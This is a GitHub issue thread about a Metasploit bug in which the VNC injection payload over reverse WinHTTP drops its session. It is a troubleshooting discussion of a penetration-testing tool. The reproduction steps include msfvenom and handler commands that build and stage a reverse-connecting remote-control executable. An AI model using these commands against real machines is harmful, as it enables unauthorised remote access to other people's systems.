Open eddieharari opened 6 years ago
VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application.
Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe
msfconsole use exploit/multi/handler set payload windows/x64/vncinject/reverse_http set lhost "IP OF METASPLOIT machine"
Running the vnchttp.exe on windows 2012 machine with connectivity to the metaploit machine
Here are the results:
msf exploit(handler) > [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ... [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900... [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started. [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer. [*] VNC connection closed. /usr/bin/vncviewer: VNC server closed connection
What should happen? VNC session should be open.
What happens instead? VNC session allways break cause of server error.
Metasploit version
Framework: 4.16.2-dev Console : 4.16.2-dev
I installed Metasploit with: